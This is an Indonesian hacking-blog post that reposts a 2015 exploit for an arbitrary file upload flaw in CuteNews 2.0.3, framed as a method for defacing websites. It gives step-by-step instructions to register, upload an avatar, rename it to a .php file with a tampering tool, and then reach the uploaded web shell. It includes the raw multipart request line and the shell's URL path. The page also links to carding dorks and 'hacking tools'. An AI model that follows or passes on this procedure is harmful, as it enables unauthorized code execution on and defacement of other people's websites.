Deface Website Metode CuteNews 2.0.3 - Arbitrary File Upload
 |
| Deface Website Metode CuteNews 2.0.3 - Arbitrary File Upload |
# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
==========================================================
Baca Juga.
- Kumpulan Dork Fresh Carding Terbaru Tahun Ini
- Kumpulan Trik Deface 100% Work
- Kumpulan Tools Hacking Terbaru Maknyooss
# Exploit :
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
1 - Sign up for New User
2 - Log In
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
4 - Select Upload Avatar Example: Evil.jpg
5 - use tamper data & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
Download Kumpulan Tools Hacking 100% Work
Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*
Greetz : ./Maniak_WiFi
\\ Like, Visit, Follow and Share
>> Facebook ** Jack Shredder
>> Instagram ** /abdur.rozak.mw
>> Twitter ** @JackTersakiti
>> Youtube ** Pringsewu Cyber Team
>> BBM ** 57318B69
// Why So Serious...
0 Komentar